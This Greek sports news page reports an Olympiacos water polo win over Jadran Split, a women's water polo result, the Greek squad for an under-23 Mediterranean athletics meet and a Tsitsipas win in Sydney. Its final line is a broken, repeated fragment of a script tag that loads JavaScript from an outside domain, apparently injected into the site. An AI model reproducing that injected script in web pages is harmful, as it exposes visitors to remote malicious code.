Ολυμπιακός-Γιαντράν Σπλιτ 13-7: Οδοστρωτήρας ο πρωταθλητής Ευρώπης * Ρέθυμνο-Εθνικός 5-10: Πρώτος γύρος με το απόλυτο οι κυανόλευκες * Ρέθυμνο – Μεσογειακοί Αγώνες Κ23: Με Καραλή-Τεντόγλου η ελληνική αποστολή * Τσιτσιπάς: Εύκολη νίκη στο ντεμπούτο του στο Σίδνεϊ

Ο πρωταθλητής Ευρώπης, δείχνοντας από νωρίς τις διαθέσεις του, δεν άφησε κανένα περιθώριο στους Κροάτες για να σκεφτούν ότι μπορούν να πάρουν θετικό αποτέλεσμα στο Παπαστράτειο και επικράτησε με το εμφατικό 13-7.

Οι Πειραιώτες νίκησαν και στα τέσσερα οκτάλεπτα, έχοντας καλύτερη εικόνα από τη Γιαντράν σε όλη την διάρκεια του αγώνα. Πέντε γκολ πέτυχε ο Γούνας και τέσσερα γκολ ο Γεννηδουνιάς για την ομάδα του Θοδωρή Βλάχου, που είχε εξαιρετικό ποσοστό στον παίκτη παραπάνω (7/9).

Ο Ολυμπιακός προηγήθηκε 5-3 στο πρώτο οκτάλεπτο και με 7-5 στο ημίχρονο, για να παίξει τρομερή άμυνα στις δυο επόμενες περιόδους, ενώ επιθετικά συνέχισε να είναι αξιόπιστος και αποτελεσματικός. Έτσι, έφτασε εύκολα στη νίκη.

Η Γιάντραν ήρθε στην Ελλάδα με 11μελη αποστολή και χωρίς δύο σημαντικά στελέχη της, τους Αλιόσα Κούνατς και Μάριν Ντέλιτς. Από την άλλη,, ο Θοδωρής Βλάχος πρότιμησε ως δεύτερο φουνταριστό τον Κώστα Κάκαρη, αφήνοντας εκτός 13άδας τον Δημήτρη Νικολαΐδη.

Πλέον, ακολουθούν οι διπλές αναμετρήσεις με τη Γιουγκ πρώτα στην Κροατία (23/01) και στη συνέχεια στον Πειραιά (06/02), που θα κρίνουν σε μεγάλο βαθμό τη διεκδίκηση της 1ης θέσης του ομίλου.

Τα οκτάλεπτα: 5-3, 2-2, 3-1, 3-1

ΟΛΥΜΠΙΑΚΟΣ: Γούνας 5, Γεννηδουνιάς 4, Φουντούλης, Δερβίσης, Αργυρόπουλος, Μπούσλιε

ΓΙΑΝΤΡΑΝ ΣΠΛΙΤ: Μπούτιτς 2, Ζόβιτς 2, Κράπιτς, Πάουερ, Πόποβιτς

Ρέθυμνο – Εθνικός 5-10: Έκλεισαν τον πρώτο γύρο με το απόλυτο οι κυανόλευκες

Η ομάδα του Κώστα Βαμβακάρη ήταν καλύτερη από το ξεκίνημα του αγώνα παίρνοντας το προβάδισμα στην πρώτη περίοδο (3-2), ενώ η διαφορά αυξήθηκε στα δύο γκολ, στο ημίχρονο (5-3). Η γηπεδούχος ομάδα δεν κατάφερε να μειώσει τη διαφορά, στο δέυτερο μισό του αγώνα, με το τελικό σκορ να είναι 10-5 υπέρ των φιλοξενούμενων.

Τα οκτάλεπτα: 2-3 , 1-2 , 1-2 , 1-3

ΝΟ Ρεθύμνου (Κώστας Φιτσανάκης): Ζοφώλη, Μαλλιαρού, Καρυπίδου Μ. 2, Φαρμάκη Μ., Γαβαλά, Κολτσίδα 2, Στρατηδάκη, Παναγιωτάκη, Φαρμάκη Ε. 1, Φραγγελάκη, Σολανάκη, Καρυπίδου Η.

Εθνικός Πειραιά (Κώστας Βαμβακάρης): Σωτηρέλη, Λούδη, Λιαπάκη, Τζελέπη 2, Μπίσμπα 1, Χατζηκυριακάκη, Λογοθέτη 1, Πέττα, ΜακΚι 2, Μπάξτερ 1, Νιαρχάκου, Κατσιμπρή 1, Μπενέκου 2, Τζούρκα

Διαιτητές: Δαμιανάκης, Χατζηαναστασίου

Αλυτάρχης: Μιχάλης Σπαγουλάκης

Μεσογειακοί Αγώνες Κ23: Με Καραλή και Τεντόγλου η ελληνική αποστολή

Συνολικά πέντε Άνδρες και δύο Γυναίκες θα συμμετάσχουν στη διοργάνωση, ανάμεσα σε αυτούς τρία δυνατά χαρτιά του ελληνικού στίβου. Ο Μίλτος Τεντόγλου, ο Εμμανουήλ Καραλής και ο Οδυσσέας Μουζενίδης θα ανοίξουν τις  εμφανίσεις τους στη σεζόν, στη διοργάνωση της Γαλλίας.

Ο πρωταθλητής Ευρώπης στο μήκος ξεκινάει τη χρονιά έχοντας ήδη στο μυαλό του το Ευρωπαϊκό Πρωτάθλημα κλειστού, όπου θα επιδιώξει να βρεθεί και πάλι στο βάθρο των νικητών, λίγους μόλις μήνες από την εξαιρετική εμφάνιση του Βερολίνου.

Τον πρώτο του αγώνα μετά την πολύμηνη απουσία, λόγω του σοβαρού τραυματισμού, θα κάνει ο Εμμανουήλ Καραλής, που και αυτός στοχεύει στη διάκριση στη διοργάνωση της Γλασκώβης. Η τελευταία εμφάνιση του Καραλή ήταν στις 4 Μαρτίου όταν με άλμα στα 5,80 μ. κατέκτησε την πέμπτη θέση στο επί κοντώ, στο Παγκόσμιο Πρωτάθλημα κλειστού.

Από περίοδο αποκατάστασης προέρχεται ο Οδυσσέας Μουζενίδης, που τραυματίστηκε τον Σεπτέμβριο στον ώμο και υποβλήθηκε σε χειρουργείο. Ο “χάλκινος” πρωταθλητής κόσμου στους Έφηβους στη σφαιροβολία ξεκινάει τη χρονιά με υψηλές προσδοκίες και με βασικό στόχο της χρονιάς τη διάκριση στο Ευρωπαϊκό πρωτάθλημα Κ23, το καλοκαίρι στο Γκέβλε.

Με ενδιαφέρον αναμένεται η πρώτη εμφάνιση στη σεζόν του Θάνου Καλάκου στα 800 μ., της Αναΐς Καραγιάννη στα 60 μ. εμπ., της Βαρβάρας Γρίλλου στα 400 μ. και της Άλκηστις Βαγγέλη στο ύψος. Εκτός ομάδας έμεινε τελικά ο Μιχάλης Παππάς, ο οποίος υπέστη θλάση στο δικέφαλο και δεν προλαβαίνει να ακολουθήσει την υπόλοιπη αποστολή.

Η ομάδα θα αναχωρήσει για την Γαλλία στις 17 Ιανουαρίου και θα επιστρέψει στις 20 Ιανουαρίου.

Αναλυτικά:

Ανδρες

800 μ.: Θάνος Καλάκος (ΓΣ Γλυφάδας)

Επί κοντώ: Εμμανουήλ Καραλής (ΓΣ Κηφισιάς)

Μήκος: Μίλτος Τεντόγλου (ΓΣ Κηφισιάς)

Σφαιροβολία: Οδυσσέας Μουζενίδης (Κένταυρος Χαλκιδικής)

Γυναίκες

400 μ.: Βαρβάρα Γρίλλου (ΓΣ Αθλος Κερατσίνι)

60 μ. εμπ.: Αναΐς Καραγιάννη (ΓΣ Κηφισιάς)

Ύψος: Άλκηστις Βαγγέλη (Αθηναϊκός όμιλος Αθλητισμού)

Τσιτσιπάς: Εύκολη νίκη στο ντεμπούτο του στο Σίδνεϊ

Ο Αργεντινός έκανε ότι καλύτερο μπορούσε, όμως αυτό δεν ήταν αρκετό για να επικρατήσει επί του “Στεφ”.

Στο πρώτο σετ όλα ήταν ιδανικά για τον Στέφανο Τσιτσιπά. Ξεκίνησε με ένα γρήγορο break μόλις στο δεύτερο game προηγήθηκε με 3-0 και στη συνέχεια απλά κράτησε το σερβίς του για να φτάσει στο 6-3. Στο δεύτερο σετ ο 20χρονος Έλληνας τενίστας προηγήθηκε ακόμα και με 5-1, όμως Αντρεόζι αντέδρασε και μείωσε σε 5-4. Σε εκείνο το σημείο ο Τσιτσιπάς κράτησε το σερβίς του και στο 5ο match point ολοκλήρωσε τη δουλειά με 6-4.

Επόμενος αντίπαλος για τον Τσιτσιπά είναι ο Αντρέα Σέπι ο οποίος επιβλήθηκε επί του Μάρτιν Κλιζάν. Η αναμέτρηση θα διεξαχθεί τα ξημερώματα της Πέμπτης (10/1, 04.00).

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>